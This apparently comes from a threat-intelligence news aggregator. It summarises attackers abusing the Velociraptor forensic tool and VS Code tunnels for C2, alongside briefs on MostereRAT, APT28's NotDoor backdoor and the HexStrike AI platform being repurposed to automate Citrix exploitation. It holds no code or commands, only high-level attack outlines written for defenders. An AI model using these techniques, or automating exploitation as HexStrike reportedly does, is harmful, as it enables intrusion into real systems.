Velociraptor Forensic Tool Abused for C2 Tunneling via Visual Studio Code
Summary
Hide â˛
Show âŧ
An unknown threat actor deployed the open-source Velociraptor forensic tool to download and execute Visual Studio Code, creating a tunnel to an attacker-controlled command-and-control (C2) server. The attack leveraged legitimate software and utilities to minimize the need for deploying custom malware. The attack involved using the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which then installed Velociraptor. This tool established contact with another Cloudflare Workers domain to download and execute Visual Studio Code with tunneling capabilities. Organizations are advised to monitor for unauthorized use of Velociraptor and implement endpoint detection and response systems to mitigate potential ransomware threats.
Timeline
-
30.08.2025 15:06 đ° 1 articles
Velociraptor Abused for C2 Tunneling via Visual Studio Code
Unknown threat actors deployed the Velociraptor forensic tool to download and execute Visual Studio Code, creating a tunnel to an attacker-controlled C2 server. The attack leveraged the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which then installed Velociraptor. This tool established contact with another Cloudflare Workers domain to download and execute Visual Studio Code with tunneling capabilities. The attack is part of a broader trend of abusing legitimate software for malicious purposes.
Show sources
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling â thehackernews.com â 30.08.2025 15:06
Information Snippets
-
Velociraptor, an open-source endpoint monitoring and digital forensic tool, was used by threat actors to deploy Visual Studio Code for C2 tunneling.
First reported: 30.08.2025 15:06đ° 1 source, 1 articleShow sources
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling â thehackernews.com â 30.08.2025 15:06
-
The attack utilized the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain.
First reported: 30.08.2025 15:06đ° 1 source, 1 articleShow sources
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling â thehackernews.com â 30.08.2025 15:06
-
The MSI file installed Velociraptor, which then established contact with another Cloudflare Workers domain to download and execute Visual Studio Code.
First reported: 30.08.2025 15:06đ° 1 source, 1 articleShow sources
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling â thehackernews.com â 30.08.2025 15:06
-
Visual Studio Code was executed with tunneling capabilities to allow remote access and remote code execution.
First reported: 30.08.2025 15:06đ° 1 source, 1 articleShow sources
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling â thehackernews.com â 30.08.2025 15:06
-
The threat actors also used the msiexec utility to download additional payloads from the workers[.]dev folder.
First reported: 30.08.2025 15:06đ° 1 source, 1 articleShow sources
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling â thehackernews.com â 30.08.2025 15:06
-
Organizations are advised to monitor for unauthorized use of Velociraptor and implement endpoint detection and response systems.
First reported: 30.08.2025 15:06đ° 1 source, 1 articleShow sources
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling â thehackernews.com â 30.08.2025 15:06
-
The attack is part of a broader trend of threat actors abusing legitimate software and tools for malicious purposes.
First reported: 30.08.2025 15:06đ° 1 source, 1 articleShow sources
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling â thehackernews.com â 30.08.2025 15:06
Similar Happenings
MostereRAT Malware Disables Security Tools, Targets Japanese Windows Users
A new malware campaign, tracked as MostereRAT, targets Japanese Windows users with sophisticated evasion techniques. MostereRAT disables antivirus and endpoint defenses, uses an obscure programming language, and abuses legitimate remote access tools to maintain persistent control over compromised systems. The malware's capabilities include privilege escalation, keylogging, data exfiltration, and the creation of hidden administrator accounts. The campaign's long-term objectives and the full extent of its impact remain unclear. MostereRAT employs Easy Programming Language (EPL) to evade detection and uses Windows Filtering Platform (WFP) filters to block security telemetry. The malware deploys legitimate remote access tools like AnyDesk, TigerVNC, and TightVNC, making it difficult to detect. The campaign highlights the importance of removing local administrator privileges and blocking unapproved remote access tools to reduce the attack surface. The malware uses mutual TLS (mTLS) to secure command-and-control (C2) communications and can run as TrustedInstaller, a built-in Windows system account with elevated permissions. MostereRAT can monitor foreground window activity associated with Qianniu - Alibaba's Seller Tool, facilitate RDP logins, and create hidden administrator accounts.
APT28 deploys NotDoor backdoor via Microsoft Outlook
APT28, a Russian state-sponsored threat group, has been using a new backdoor malware called NotDoor to target Microsoft Outlook. The malware exploits Outlook as a covert communication, data exfiltration, and malware delivery channel. NotDoor is a VBA macro that monitors incoming emails for specific trigger words. When triggered, it allows attackers to exfiltrate data, upload files, and execute commands on the victim's computer. The malware is delivered via a legitimate signed binary, Microsoft's OneDrive.exe, vulnerable to DLL sideloading. The backdoor was identified by researchers from Lab52, the threat intelligence arm of Spanish cybersecurity firm S2 Grupo. The malware has been deployed against companies in NATO member countries, using advanced techniques to evade detection and maintain persistence. NotDoor supports multiple commands for data exfiltration and file uploads, and uses Base64-encoded PowerShell commands for various operations. The malware creates a staging folder in the %TEMP% directory to store and exfiltrate files, encoding them with custom encryption before sending via email. APT28's attacks involve the abuse of Microsoft Dev Tunnels for C2 infrastructure, providing stealth and rapid infrastructure rotation. The attack chain includes the use of bogus Cloudflare Workers domains to distribute additional payloads, demonstrating a high level of specialized design and obfuscation.
HexStrike AI Exploits Citrix Vulnerabilities Disclosed in August 2025
Threat actors have begun using HexStrike AI to exploit Citrix vulnerabilities disclosed in August 2025. HexStrike AI, an AI-driven security platform, was designed to automate reconnaissance and vulnerability discovery for authorized red teaming operations, but it has been repurposed for malicious activities. The exploitation attempts target three Citrix vulnerabilities, with some threat actors offering access to vulnerable NetScaler instances for sale on darknet forums. The use of HexStrike AI by threat actors significantly reduces the time between vulnerability disclosure and exploitation, increasing the risk of widespread attacks. The tool's automation capabilities allow for continuous exploitation attempts, enhancing the likelihood of successful breaches. Security experts emphasize the urgency of patching and hardening affected systems to mitigate the risks posed by this AI-driven threat. HexStrike AI's client features a retry logic and recovery handling to mitigate the effects of failures in any individual step on its complex operations. HexStrike AI has been open-source and available on GitHub for the last month, where it has already garnered 1,800 stars and over 400 forks. Hackers started discussing HexStrike AI on hacking forums within hours of the Citrix vulnerabilities disclosure. HexStrike AI has been used to automate the exploitation chain, including scanning for vulnerable instances, crafting exploits, delivering payloads, and maintaining persistence. Check Point recommends defenders focus on early warning through threat intelligence, AI-driven defenses, and adaptive detection.